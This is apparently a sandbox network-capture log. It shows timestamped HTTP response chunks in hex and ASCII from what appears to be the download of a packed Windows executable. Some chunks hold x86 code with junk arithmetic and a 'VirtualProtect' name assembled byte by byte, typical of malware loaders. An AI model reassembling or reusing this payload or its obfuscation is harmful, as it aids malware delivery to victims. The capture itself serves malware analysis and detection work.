                                                                                                                                                        2021-12-28 02:24:00 UTC1529INData Raw: 7a 85 b9 09 81 a8 b4 40 cc 31 a3 23 2d 0c 6d 37 da ea 71 d2 4a 01 22 10 d7 cf 4c 21 52 15 59 ab 09 9a 07 8b 55 c3 7d 59 eb 22 4c ec a7 91 77 ff 39 8d 54 fe e0 e2 7f 35 f9 fa e2 4a 0f 64 85 c8 e3 8c 35 88 2d 50 76 ce 77 6e 60 be 5f 2e 7d 0d 95 98 a1 15 ed 8c ca 8d 65 d3 27 27 56 8a 1b 13 bb af 4d a1 8f 2b 89 0a 0f 3e 3e 1d ec 85 e3 b2 c1 0f 0a 20 da 3d 6b 1d 40 50 bd cb 1d f6 45 79 24 78 b2 df ad 3c 4c f3 22 3a 33 2f d0 72 7c ff ce 6f c2 2f 87 32 d1 02 2c 26 c2 12 ae 2c 00 56 92 69 3f 1a 4d 98 ab 44 0e 95 f3 b0 08 a1 15 df 48 53 c0 1a 6c cc ed 79 4d e2 e8 5b f7 2a 4d e3 06 52 5c d4 f2 f7 e8 20 f5 49 3c c4 59 2e 72 d6 97 19 f3 2c 5a 5b 42 18 77 56 0c d7 7f 10 70 e8 ad b2 7a 07 17 03 82 43 a3 d6 b5 3e c7 ef a2 ed 37 51 62 22 51 da f3 ec 49 cc 16 c0 ac 9f ed
                                                                                                                                                        Data Ascii: z@1#-m7qJ"L!RYU}Y"Lw9T5Jd5-Pvwn`_.}e''VM+>> =k@PEy$x<L":3/r|o/2,&,Vi?MDHSlyM[*MR\ I<Y.r,Z[BwVpzC>7Qb"QI
                                                                                                                                                        2021-12-28 02:24:00 UTC1530INData Raw: ac fb 8b 0c 32 e5 f4 f3 1a a3 0e a8 ad b6 23 fa 6d 10 05 99 f9 58 5a 66 c1 53 76 bd c3 e5 f2 6b e8 92 b0 41 5c a0 e1 cb e1 1b 99 be 8e 4b ea 0f bb b2 84 57 9b d4 53 be d1 d7 64 58 71 a8 16 7f 88 bd 7a aa a9 5c ea fe ed cd cb 12 35 68 d6 0b 73 e9 c0 d0 64 63 67 3d db 9f a1 cf 3b fa 93 26 fb f1 1b 2b ec 58 63 9c 66 27 34 70 5e 50 bd 34 0b 17 86 03 07 8b 1b f1 52 d7 04 4d 2b 82 c2 20 1f 66 d9 0f 16 09 7d 47 76 14 c0 cc 2c e1 b3 46 58 5b 55 d0 c5 86 3d e1 f6 ce 16 66 87 2d 96 e1 25 88 fa cd 6b c2 88 a7 91 65 82 b7 a9 e2 df 17 b5 a4 ac f5 62 e6 88 b8 35 ca bb 12 31 bf 02 aa ed 38 e6 92 83 1b d6 e7 1c 8b ec 46 81 dc 3d 39 c9 12 aa 0f 32 6e fb 39 05 4b c6 d1 38 d6 f2 8d 53 1d 61 6b 9d e0 4f 09 20 82 4a 1e 11 c4 35 ba cc 13 ae e7 50 0d 63 ab 26 ac 10 c8 9b a1 f3
                                                                                                                                                        Data Ascii: 2#mXZfSvkA\KWSdXqz\5hsdcg=;&+Xcf'4p^P4RM+ f}Gv,FX[U=f-%keb518F=92n9K8SakO J5Pc&
                                                                                                                                                        2021-12-28 02:24:00 UTC1546INData Raw: 5f 18 49 26 e0 df cb ce e0 83 18 42 cc c7 4d 8d 83 77 42 48 f8 52 e2 e5 19 6f 8a 51 c7 52 fc 6f da b1 06 07 da ce 6f 6f 6c c3 ad a9 15 ff 2e 3e 84 25 22 6f 8e 68 51 3e 29 84 54 39 6b 5a 5c 88 dc 6e 4f da 9c 4f 80 66 fb 6b 57 f6 67 37 d0 0a 05 36 46 9f fc 3d d3 e8 ee 9b c2 c7 24 d6 cb a8 f3 49 65 dd a7 3f 68 a2 9e 70 10 16 96 65 78 d7 10 49 6f 9b 7a 74 96 01 37 68 eb 70 18 92 ed ab 28 d5 c0 9a 01 ad 20 37 c2 8f 92 a7 c3 b7 e7 d2 f4 80 95 1f c6 b3 e9 22 ef 7e 91 6e 53 6b 76 06 b7 d4 3b 83 fd a0 c1 27 59 88 89 58 90 38 41 2c 6a 7c a9 e9 a5 bb ce d1 21 3f 13 09 e1 1b 11 54 4c c0 80 53 ad 50 4a 5a 4b 76 45 b2 a0 aa ff ca 7a 69 9c ec 3e 6b cc dc 2d 06 f1 96 d0 69 09 ec 42 0a 77 89 c1 47 bf a1 89 fe a9 36 b5 20 c9 94 a1 b9 49 35 02 98 00 c4 63 bc 61 fb d7 bb 44
                                                                                                                                                        Data Ascii: _I&BMwBHRoQRoool.>%"ohQ>)T9kZ\nOOfkWg76F=$Ie?hpexIozt7hp( 7"~nSkv;'YX8A,j|!?TLSPJZKvEzi>k-iBwG6 I5caD
                                                                                                                                                        2021-12-28 02:24:00 UTC1547INData Raw: 68 47 f2 18 83 30 e4 ee f1 ec b3 e5 f3 73 ba 47 46 dd b9 3b a3 9a 66 e6 36 11 e6 55 d0 f9 f5 a8 23 1c 86 3a ae 01 80 fa 00 d8 f9 fa ed ce ce ab da 41 86 a4 f0 88 52 d2 4f f1 7d 64 9b f1 89 c2 01 af 91 49 68 63 74 1e e9 e5 b9 c7 33 09 d6 75 75 f2 90 cc e0 b9 75 c5 45 90 f8 1f 5e 3b 68 d2 d1 96 7f 73 53 b8 8d 9a 20 12 08 90 c7 78 f9 f6 3e 2a 4b 3b 05 3e 5e 3a 74 26 ef db f3 b8 48 55 54 c7 b7 a0 9e d2 d5 bf ef 73 25 9a 8b 47 61 21 20 88 39 ce 10 65 89 48 4c 8b 44 f4 37 67 0b 50 07 81 13 52 8f 09 56 47 46 fc e3 8f 3c 2b 8f 27 76 50 6b f9 de 5c f3 3c af 47 7f e4 b0 56 de 1d 7e c6 ed 96 1b 2f ef 12 82 f8 29 71 a3 ef b3 88 1f a9 68 53 4b 8b 61 44 00 86 03 4c a5 08 46 78 65 4b 8d e3 4a fc 7e 77 25 b8 dc 01 c5 d0 5c c2 52 69 8f 07 f8 6b 14 7c 44 85 bb fa 10 97 a3
                                                                                                                                                        Data Ascii: hG0sGF;f6U#:ARO}dIhct3uuuE^;hsS x>*K;>^:t&HUTs%Ga! 9eHLD7gPRVGF<+'vPk\<GV~/)qhSKaDLFxeKJ~w%\Rik|D
                                                                                                                                                        2021-12-28 02:24:00 UTC1563INData Raw: ff 37 26 01 87 b4 1c f4 53 24 85 64 d1 bb 50 5b f6 82 82 1a 42 6b ad 24 08 4d 02 f4 d0 ef 33 8c 97 ea 02 bf 6d 70 19 63 8c 91 c2 2e 5f cd a8 6d 25 00 9a 9f 57 86 0d ac 2c dc 2e 32 09 80 60 b0 f9 5b 0f 96 c0 28 21 97 3f 9a 1b 51 40 fe b8 ff 0c 9e 86 97 54 36 20 46 4c 4f c3 05 c6 b6 e5 73 ae 03 9e a9 ed b0 06 6d ff af 12 32 5f 98 5e 0d 7e 31 f3 5d e6 6b ba ae ac dd 91 a3 c4 38 19 00 07 f9 54 4b c4 8d d7 b8 87 6a 25 16 a3 b0 b2 ff 71 ae ca 70 b5 17 8d 5b da b6 49 6e 68 cf 50 ba 0b 27 3b bb ea 3c 93 5a ba fe eb bf 98 8d a3 86 84 f1 04 e3 85 05 eb 25 d0 62 46 4a 6e b4 22 e7 73 78 de 3f 42 67 f1 fd 1e 43 51 ba e1 f4 34 65 fb 9a a0 cd 17 3a 15 a6 e1 91 cd 99 7e af a8 f4 41 61 c8 3a 12 6a 38 5e e3 e6 7f 76 77 d9 5a 9e 2a 38 54 00 56 3f 28 9e 27 05 6a 11 2d f7 77
                                                                                                                                                        Data Ascii: 7&S$dP[Bk$M3mpc._m%W,.2`[(!?Q@T6 FLOsm2_^~1]k8TKj%qp[InhP';<Z%bFJn"sx?BgCQ4e:~Aa:j8^vwZ*8TV?('j-w
                                                                                                                                                        2021-12-28 02:24:00 UTC1564INData Raw: 87 f3 b6 44 91 0f e3 9f 4b f3 fe a7 5a 5d 71 16 e5 17 12 ce 24 2b 6f ec bd 84 3c e8 86 c1 5c 90 15 6a 9a c4 cf 46 17 86 af fa 9f 4d 08 83 3e 1d 5d 30 00 d9 71 97 a6 a9 70 5c cb c2 94 07 fa a6 e0 08 5c e6 5f e9 5b 03 30 4c cf aa 82 09 56 35 c9 cf 03 68 a8 d9 7e a2 d2 b7 93 2c 11 bf 34 47 62 43 18 21 af 41 7c 40 46 51 d1 76 5c 89 ab d3 64 b1 7b 04 20 48 24 68 c9 f6 4a 3d c9 60 89 3b d8 89 fe 0b b7 86 2f 21 38 e0 a9 27 df 1f 79 ec d3 51 61 e6 8e bd d3 08 02 81 cc 69 03 f7 5d 57 26 15 2d 63 a5 4a 80 8d 73 73 09 74 6a 2b 2a a6 f5 5f 33 d0 0d 54 4a e1 fd 0b d6 3d 12 21 6f 89 85 29 f6 c8 2f 0b 0e 50 6a 01 c6 bf 5c b9 f2 e1 4b 77 0c 5c 05 78 27 98 3f 72 ec f2 dd d9 fb 2c 58 11 be 1e 71 04 18 2d 1b 5f bf d3 05 07 64 03 11 32 97 66 c4 96 db bc 20 f6 28 7f 3b f5 f3
                                                                                                                                                        Data Ascii: DKZ]q$+o<\jFM>]0qp\\_[0LV5h~,4GbC!A|@FQv\d{ H$hJ=`;/!8'yQai]W&-cJsstj+*_3TJ=!o)/Pj\Kw\x'?r,Xq-_d2f (;
                                                                                                                                                        2021-12-28 02:24:00 UTC1580INData Raw: dc a9 e0 66 07 33 c2 ee c4 df d0 82 e8 c7 be bc 22 b6 fb 14 80 56 f6 0d 6f 74 d6 15 3d 8d 33 de d1 2f df 28 3c 4a e8 14 9e 2b 95 e1 44 24 56 a1 c9 91 1d 32 7e b9 13 ea bd 6b 4d d1 aa 7b 09 cf ef 70 1a 0e ed 2c 74 96 9a 93 68 d7 57 b8 ef 78 97 6b a7 02 d0 33 06 97 56 95 ed 0f 22 f7 6a c0 29 c8 92 a4 ca 91 49 0e d8 21 72 37 a8 82 a2 76 61 c9 61 c6 2e ac 4f c5 15 f5 c1 79 69 eb 03 28 d0 0f cd 7a 3d df 65 55 c3 b0 78 c8 92 34 87 14 f7 c9 2d c3 74 61 ea 4e ac 6a 95 39 5b 8a a9 78 8d ab 43 bb 07 9c c6 9f e5 0d f4 a9 07 a2 32 cc 3a fb af 26 c7 2a 21 25 9e d3 dc 0c 5e 40 7a 7d 1e 3e 16 aa 0c 35 8b d8 f9 13 a7 c6 86 9e c5 e0 de 07 d4 1b 7b 35 04 2e 8d 3e 1a 35 5f 1c 3a 3b b9 25 4a 37 bf 85 37 c5 90 78 f7 5a 04 a9 a6 36 6c 3f ec 18 c3 66 7e 2d 2d dc 40 71 99 3f 97
                                                                                                                                                        Data Ascii: f3"Vot=3/(<J+D$V2~kM{p,thWxk3V"j)I!r7vaa.Oyi(z=eUx4-taNj9[xC2:&*!%^@z}>5{5.>5_:;%J77xZ6l?f~--@q?
                                                                                                                                                        2021-12-28 02:24:00 UTC1581INData Raw: c7 c1 82 c8 bd d3 80 0a 13 fe 19 6a 7d ba 8a 12 37 2f b6 32 a0 d2 e4 6c 51 6c a9 22 46 31 ae e5 f5 40 b5 a8 b4 9e ce 05 8a 9d 5e c6 aa 8b 40 5e 38 dc cb 37 80 8e 6c ff 05 6c fb aa 06 bc f5 fc 15 f8 8a bd 34 24 3a 59 f0 c6 20 ba 56 5a b8 c2 f0 c3 45 3d 66 13 e9 92 f2 64 42 63 1b 28 d2 f3 04 78 15 3f 66 c0 87 ce da 31 0a 3d db f6 5d dc 99 99 ca 49 4b 03 54 e4 5e 93 f5 89 4a 71 55 5e 02 79 00 6e bf 30 90 7e d9 bf dd 26 d1 7c 13 7a 2c 57 81 9d 1c 75 cb 31 be ef 1d 17 51 cd 46 b8 3f 22 eb 5f ec 84 38 d1 5b 87 e7 94 41 b0 a6 0e de 5b da 1e 74 82 65 19 0c 1d 1d 74 30 73 ca 76 5a 26 c6 ff 42 f5 05 3d 18 47 e9 87 12 28 8f 76 39 4c 71 94 11 d2 29 b7 ac 22 7e e2 03 47 8b 66 da 9e b6 c2 d2 92 e4 2a db 2a 7f 7c d4 86 11 5f 34 a6 18 a2 2e 13 82 9b f3 cb e8 ba 22 3b 58
                                                                                                                                                        Data Ascii: j}7/2lQl"F1@^@^87ll4$:Y VZE=fdBc(x?f1=]IKT^JqU^yn0~&|z,Wu1QF?"_8[A[tet0svZ&B=G(v9Lq)"~Gf**|_4.";X
                                                                                                                                                        2021-12-28 02:24:00 UTC1597INData Raw: 00 8b 84 24 04 05 00 00 81 84 24 30 03 00 00 98 c1 22 36 81 ac 24 74 02 00 00 4d 06 31 43 81 84 24 b8 00 00 00 41 b8 6a 19 81 ac 24 fc 03 00 00 c1 4f cd 6c 81 ac 24 04 05 00 00 c2 3b 57 50 b8 ee 9b 6c 49 f7 a4 24 8c 03 00 00 8b 84 24 8c 03 00 00 81 ac 24 60 04 00 00 83 47 72 4f 81 84 24 8c 04 00 00 37 2d 39 1f b8 7c 4c 87 7b f7 a4 24 8c 04 00 00 8b 84 24 8c 04 00 00 b8 5f 14 0b 00 f7 a4 24 b8 00 00 00 8b 84 24 b8 00 00 00 b8 d9 92 5c 01 f7 a4 24 30 04 00 00 8b 84 24 30 04 00 00 81 84 24 30 04 00 00 70 7f 7d 51 81 84 24 c8 02 00 00 d2 86 ea 04 81 ac 24 60 04 00 00 5d c7 7a 33 81 84 24 4c 02 00 00 a0 33 c5 3a 81 84 24 64 02 00 00 92 8f 6c 57 81 ac 24 30 03 00 00 b4 59 e9 73 81 84 24 fc 03 00 00 49 2a 05 26 b8 c4 8f 13 23 f7 a4 24 98 01 00 00 8b 84 24 98 01
                                                                                                                                                        Data Ascii: $$0"6$tM1C$Aj$Ol$;WPlI$$$`GrO$7-9|L{$$_$$\$0$0$0p}Q$$`]z3$L3:$dlW$0Ys$I*&#$$
                                                                                                                                                        2021-12-28 02:24:00 UTC1598INData Raw: 81 84 24 9c 01 00 00 ca 63 1e 3d b8 d3 2d bc 23 f7 a4 24 20 01 00 00 8b 84 24 20 01 00 00 81 84 24 78 04 00 00 4e d4 27 4e 81 84 24 ec 04 00 00 7a d7 c6 6a 80 05 48 4a 4b 00 f6 80 05 50 4a 4b 00 f6 56 ff 35 9c 04 53 00 66 c7 05 53 4a 4b 00 65 63 c6 05 55 4a 4b 00 74 66 c7 05 4d 4a 4b 00 61 6c c6 05 52 4a 4b 00 74 66 c7 05 4a 4a 4b 00 72 74 c6 05 4c 4a 4b 00 75 c6 05 49 4a 4b 00 69 ff 15 60 10 40 00 8d 4c 24 04 51 6a 40 ff 35 a4 0e 53 00 a3 44 4a 4b 00 ff 35 a4 d4 52 00 ff d0 5e 81 c4 2c 05 00 00 c3 ff 35 a4 0e 53 00 6a 00 ff 15 68 10 40 00 a3 a4 d4 52 00 c3 55 8b ec b8 5c 23 00 00 e8 d4 45 00 00 83 65 fc 00 eb 07 8b 45 fc 40 89 45 fc 81 7d fc f6 ea 2b 33 0f 8d e9 00 00 00 ff 15 c0 10 40 00 83 3d a4 0e 53 00 16 75 46 6a 00 6a 00 6a 00 ff 15 bc 10 40 00 8d
                                                                                                                                                        Data Ascii: $c=-#$ $ $xN'N$zjHJKPJKV5SfSJKecUJKtfMJKalRJKtfJJKrtLJKuIJKi`@L$Qj@5SDJK5R^,5Sjh@RU\#EeE@E}+3@=SuFjjj@
                                                                                                                                                        2021-12-28 02:24:00 UTC1614INData Raw: 8b ec 51 89 4d fc 8b 45 fc c7 00 5c 1d 40 00 8b 4d fc e8 a6 00 00 00 8b e5 5d c3 cc cc 8b ff 55 8b ec 83 ec 08 89 4d fc 8b 45 fc 83 78 04 00 74 0b 8b 4d fc 8b 51 04 89 55 f8 eb 07 c7 45 f8 64 1d 40 00 8b 45 f8 8b e5 5d c3 cc cc cc 8b ff 55 8b ec 83 ec 08 89 4d f8 83 7d 08 00 74 4b 8b 45 08 50 e8 76 5d 00 00 83 c4 04 83 c0 01 89 45 fc 8b 4d fc 51 e8 44 69 00 00 83 c4 04 8b 55 f8 89 42 04 8b 45 f8 83 78 04 00 74 1e 8b 4d 08 51 8b 55 fc 52 8b 45 f8 8b 48 04 51 e8 3e 66 00 00 83 c4 0c 8b 55 f8 c6 42 08 01 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 51 89 4d fc 8b 45 fc 0f b6 48 08 85 c9 74 0f 8b 55 fc 8b 42 04 50 e8 b0 2d 00 00 83 c4 04 8b 4d fc c7 41 04 00 00 00 00 8b 55 fc c6 42 08 00 8b e5 5d c3 cc cc cc cc cc cc cc cc 8b ff
                                                                                                                                                        Data Ascii: QME\@M]UMExtMQUEd@E]UM}tKEPv]EMQDiUBExtMQUREHQ>fUB]UQMEHtUBP-MAUB]
                                                                                                                                                        2021-12-28 02:24:00 UTC1615INData Raw: c7 02 83 f9 08 72 a6 f3 a5 ff 24 95 c0 ca 48 00 90 23 d1 8a 06 88 07 83 c6 01 c1 e9 02 83 c7 01 83 f9 08 72 88 f3 a5 ff 24 95 c0 ca 48 00 8d 49 00 b7 ca 48 00 a4 ca 48 00 9c ca 48 00 94 ca 48 00 8c ca 48 00 84 ca 48 00 7c ca 48 00 74 ca 48 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 c0 ca 48 00 8b ff d0 ca 48 00 d8 ca 48 00 e4 ca 48 00 f8 ca 48 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9
                                                                                                                                                        Data Ascii: r$H#r$HIHHHHHH|HtHDDDDDDDDDDDDDD$HHHHHE^_E^_FGE^_IFGFGE^_t1|9u$
                                                                                                                                                        2021-12-28 02:24:00 UTC1631INData Raw: 00 8b e5 5d c3 cc cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 08 e8 63 52 00 00 89 45 f8 8b 45 f8 8b 48 6c 89 4d fc 8b 55 fc 3b 15 a0 45 4b 00 74 16 8b 45 f8 8b 48 70 23 0d 58 43 4b 00 75 08 e8 a9 4c 00 00 89 45 fc 8b 55 fc 8b 42 04 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 08 e8 13 52 00 00 89 45 f8 8b 45 f8 8b 48 6c 89 4d fc 8b 55 fc 3b 15 a0 45 4b 00 74 16 8b 45 f8 8b 48 70 23 0d 58 43 4b 00 75 08 e8 59 4c 00 00 89 45 fc 8b 45 fc 83 c0 0c 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a fe 68 c0 a5 4a 00 68 b0 34 49 00 64 a1 00 00 00 00 50 83 c4 f4 53 56 57 a1 80 3b 4b 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 e8 b9 ef ff ff c7 45 fc 00 00 00 00 8b 45 08 50 e8 39 00 00 00 83 c4 04 89 45 e4 c7 45 fc fe ff
                                                                                                                                                        Data Ascii: ]UcREEHlMU;EKtEHp#XCKuLEUB]UREEHlMU;EKtEHp#XCKuYLEE]UjhJh4IdPSVW;K1E3PEdEEP9EE
                                                                                                                                                        2021-12-28 02:24:00 UTC1632INData Raw: 8b ec 6a fe 68 00 a6 4a 00 68 b0 34 49 00 64 a1 00 00 00 00 50 83 c4 e4 53 56 57 a1 80 3b 4b 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 c7 45 e0 00 00 00 00 c7 45 e4 00 00 00 00 83 7d 08 00 7c 0f 83 7d 08 05 7f 09 c7 45 d4 01 00 00 00 eb 07 c7 45 d4 00 00 00 00 8b 45 d4 89 45 d8 83 7d d8 00 75 21 68 c0 38 40 00 6a 00 68 26 02 00 00 68 10 38 40 00 6a 02 e8 60 19 00 00 83 c4 14 83 f8 01 75 01 cc 83 7d d8 00 75 30 e8 fc 29 00 00 c7 00 16 00 00 00 6a 00 68 26 02 00 00 68 10 38 40 00 68 a8 38 40 00 68 c0 38 40 00 e8 0b 33 00 00 83 c4 14 33 c0 e9 8b 01 00 00 e8 bc 4d 00 00 89 45 dc e8 24 48 00 00 8b 55 dc 8b 42 70 83 c8 10 8b 4d dc 89 41 70 c7 45 fc 00 00 00 00 68 31 02 00 00 68 74 38 40 00 6a 02 6a 01 68 d8 00 00 00 e8 26 c3 ff ff 83 c4 14 89 45 e4 83 7d
                                                                                                                                                        Data Ascii: jhJh4IdPSVW;K1E3PEdEE}|}EEEE}u!h8@jh&h8@j`u}u0)jh&h8@h8@h8@33ME$HUBpMApEh1ht8@jjh&E}
                                                                                                                                                        2021-12-28 02:24:00 UTC1648INData Raw: ec fa ff ff 00 00 00 00 eb 0f 8b 85 ec fa ff ff 83 c0 01 89 85 ec fa ff ff 81 bd ec fa ff ff 00 01 00 00 73 15 8b 8d ec fa ff ff 8a 95 ec fa ff ff 88 94 0d f0 fa ff ff eb d0 c6 85 f0 fa ff ff 20 8d 85 de fa ff ff 89 85 f4 fb ff ff eb 0f 8b 8d f4 fb ff ff 83 c1 02 89 8d f4 fb ff ff 8b 95 f4 fb ff ff 0f b6 02 85 c0 74 44 8b 8d f4 fb ff ff 0f b6 11 89 95 ec fa ff ff eb 0f 8b 85 ec fa ff ff 83 c0 01 89 85 ec fa ff ff 8b 8d f4 fb ff ff 0f b6 51 01 39 95 ec fa ff ff 77 10 8b 85 ec fa ff ff c6 84 05 f0 fa ff ff 20 eb cf eb a0 6a 00 8b 4d 08 8b 51 0c 52 8b 45 08 8b 48 04 51 8d 95 f8 fd ff ff 52 68 00 01 00 00 8d 85 f0 fa ff ff 50 6a 01 6a 00 e8 e2 44 00 00 83 c4 20 6a 00 8b 4d 08 8b 51 04 52 68 00 01 00 00 8d 85 f8 fc ff ff 50 68 00 01 00 00 8d 8d f0 fa ff ff 51
                                                                                                                                                        Data Ascii: s tDQ9w jMQREHQRhPjjD jMQRhPhQ
                                                                                                                                                        2021-12-28 02:24:00 UTC1649INData Raw: 08 8b 54 01 50 52 ff 15 f8 10 40 00 8b 45 fc c1 e0 04 8b 4d 08 83 7c 01 4c 00 74 24 8b 55 fc c1 e2 04 8b 45 08 83 7c 10 54 00 74 14 8b 4d fc c1 e1 04 8b 55 08 8b 44 0a 54 50 ff 15 f8 10 40 00 eb 84 8b 4d 08 8b 91 d4 00 00 00 81 c2 b4 00 00 00 52 ff 15 f8 10 40 00 8b e5 5d c3 cc 8b ff 55 8b ec 51 83 7d 08 00 0f 84 15 01 00 00 8b 45 08 50 ff 15 f8 11 40 00 8b 4d 08 83 b9 b0 00 00 00 00 74 10 8b 55 08 8b 82 b0 00 00 00 50 ff 15 f8 11 40 00 8b 4d 08 83 b9 b8 00 00 00 00 74 10 8b 55 08 8b 82 b8 00 00 00 50 ff 15 f8 11 40 00 8b 4d 08 83 b9 b4 00 00 00 00 74 10 8b 55 08 8b 82 b4 00 00 00 50 ff 15 f8 11 40 00 8b 4d 08 83 b9 c0 00 00 00 00 74 10 8b 55 08 8b 82 c0 00 00 00 50 ff 15 f8 11 40 00 c7 45 fc 00 00 00 00 eb 09 8b 4d fc 83 c1 01 89 4d fc 83 7d fc 05 7f 6d
                                                                                                                                                        Data Ascii: TPR@EM|Lt$UE|TtMUDTP@MR@]UQ}EP@MtUP@MtUP@MtUP@MtUP@EMM}m
                                                                                                                                                        2021-12-28 02:24:00 UTC1665INData Raw: 11 52 ff 15 b0 12 40 00 85 c0 74 5b 8b 45 ac c1 f8 05 8b 4d ac 83 e1 1f c1 e1 06 03 0c 85 40 2e 53 00 89 4d 9c 8b 55 9c 8b 45 98 8b 08 89 0a 8b 55 9c 8b 45 a4 8a 08 88 4a 04 68 a0 0f 00 00 8b 55 9c 83 c2 0c 52 ff 15 44 12 40 00 85 c0 75 08 83 c8 ff e9 60 01 00 00 8b 45 9c 8b 48 08 83 c1 01 8b 55 9c 89 4a 08 e9 3b ff ff ff c7 45 ac 00 00 00 00 eb 09 8b 45 ac 83 c0 01 89 45 ac 83 7d ac 03 0f 8d 21 01 00 00 8b 4d ac c1 e1 06 03 0d 40 2e 53 00 89 4d 9c 8b 55 9c 83 3a ff 74 0c 8b 45 9c 83 38 fe 0f 85 e7 00 00 00 8b 4d 9c c6 41 04 81 83 7d ac 00 75 09 c7 45 90 f6 ff ff ff eb 10 8b 55 ac 83 ea 01 f7 da 1b d2 83 c2 f5 89 55 90 8b 45 90 50 ff 15 8c 12 40 00 89 45 a0 83 7d a0 ff 0f 84 8f 00 00 00 83 7d a0 00 0f 84 85 00 00 00 8b 4d a0 51 ff 15 b0 12 40 00 89 45 b0
                                                                                                                                                        Data Ascii: R@t[EM@.SMUEUEJhURD@u`EHUJ;EEE}!M@.SMU:tE8MA}uEUUEP@E}}MQ@E
                                                                                                                                                        2021-12-28 02:24:00 UTC1666INData Raw: 00 ff 15 6c 12 40 00 68 bc 65 40 00 ff 15 68 12 40 00 83 3d c8 1a 53 00 00 75 0a 6a 01 e8 0b a9 ff ff 83 c4 04 68 09 04 00 c0 ff 15 64 12 40 00 50 ff 15 60 12 40 00 8b e5 5d c3 cc cc 8b ff 55 8b ec 51 8b 45 08 83 78 20 00 74 6f 6a 3f 68 74 66 40 00 6a 02 68 64 01 00 00 6a 01 e8 bc 3b ff ff 83 c4 14 89 45 fc 83 7d fc 00 75 0a b8 01 00 00 00 e9 b2 00 00 00 8b 4d 08 51 8b 55 fc 52 e8 a9 00 00 00 83 c4 08 85 c0 74 21 8b 45 fc 50 e8 d9 0c 00 00 83 c4 04 6a 02 8b 4d fc 51 e8 7b 42 ff ff 83 c4 08 b8 01 00 00 00 eb 7d 8b 55 fc c7 82 b4 00 00 00 01 00 00 00 eb 07 c7 45 fc 60 43 4b 00 8b 45 08 81 b8 d4 00 00 00 60 43 4b 00 74 4a 8b 4d 08 8b 91 d4 00 00 00 81 c2 b4 00 00 00 52 ff 15 f8 11 40 00 85 c0 75 30 8b 45 08 8b 88 d4 00 00 00 83 b9 b4 00 00 00 00 7f 1e 68 30
                                                                                                                                                        Data Ascii: l@he@h@=Sujhd@P`@]UQEx toj?htf@jhdj;E}uMQURt!EPjMQ{B}UE`CKE`CKtJMR@u0Eh0
                                                                                                                                                        2021-12-28 02:24:00 UTC1682INData Raw: 7c 12 40 00 eb 4b eb 46 68 54 73 40 00 8b 45 08 50 e8 e7 5a ff ff 83 c4 08 85 c0 75 22 6a 02 8d 4d fc 51 68 0b 00 00 20 8b 55 0c 8b 42 1c 50 ff 15 94 12 40 00 85 c0 75 04 33 c0 eb 14 eb 0f 8b 4d 08 51 e8 e5 40 00 00 83 c4 04 89 45 fc 8b 45 fc 8b e5 5d c3 cc cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 08 66 8b 45 08 66 89 45 f8 c7 45 fc 00 00 00 00 eb 09 8b 4d fc 83 c1 01 89 4d fc 83 7d fc 0a 73 19 0f b7 55 f8 8b 45 fc 0f b7 0c 45 a8 71 40 00 3b d1 75 04 33 c0 eb 07 eb d8 b8 01 00 00 00 8b e5 5d c3 cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 08 56 0f b7 45 08 25 ff 03 00 00 0f b7 c8 81 c9 00 04 00 00 0f b7 d1 89 55 fc 6a 02 8d 45 f8 50 68 01 00 00 20 8b 4d fc 51 ff 15 94 12 40 00 85 c0 75 04 33 c0 eb 39 8b 55 08 3b 55 f8 74 2c 83 7d 0c 00 74 26 8b 45 10 8b 08 51
                                                                                                                                                        Data Ascii: |@KFhTs@EPZu"jMQh UBP@u3MQ@EE]UfEfEEMM}sUEEq@;u3]UVE%UjEPh MQ@u39U;Ut,}t&EQ
                                                                                                                                                        2021-12-28 02:24:00 UTC1683INData Raw: ff 00 00 00 00 e8 83 5e ff ff 8b 08 89 8d c8 af ff ff e8 76 5e ff ff c7 00 00 00 00 00 8b 55 1c 52 8b 45 18 50 68 eb 0f 00 00 68 00 10 00 00 8d 8d d0 af ff ff 51 e8 c2 25 00 00 83 c4 14 89 85 cc af ff ff 83 bd cc af ff ff 00 7d 2a 6a 00 68 2a 01 00 00 68 98 76 40 00 68 40 7c 40 00 68 9c 2c 40 00 6a 22 6a 16 e8 21 5e ff ff 8b 10 52 e8 79 14 ff ff 83 c4 20 e8 11 5e ff ff 8b 8d c8 af ff ff 89 08 83 bd cc af ff ff 00 7d 38 6a 00 68 2d 01 00 00 68 98 76 40 00 68 40 7c 40 00 68 10 7b 40 00 68 f4 4a 40 00 68 00 10 00 00 8d 95 d0 af ff ff 52 e8 24 52 ff ff 83 c4 0c 50 e8 cb 39 ff ff 83 c4 18 83 7d 08 02 75 56 83 7d 18 00 74 0c c7 85 98 af ff ff f8 7a 40 00 eb 0a c7 85 98 af ff ff e4 7a 40 00 6a 00 68 32 01 00 00 68 98 76 40 00 68 40 7c 40 00 68 38 7a 40 00 8b 85
                                                                                                                                                        Data Ascii: ^v^UREPhhQ%}*jh*hv@h@|@h,@j"j!^Ry ^}8jh-hv@h@|@h{@hJ@hR$RP9}uV}tz@z@jh2hv@h@|@h8z@
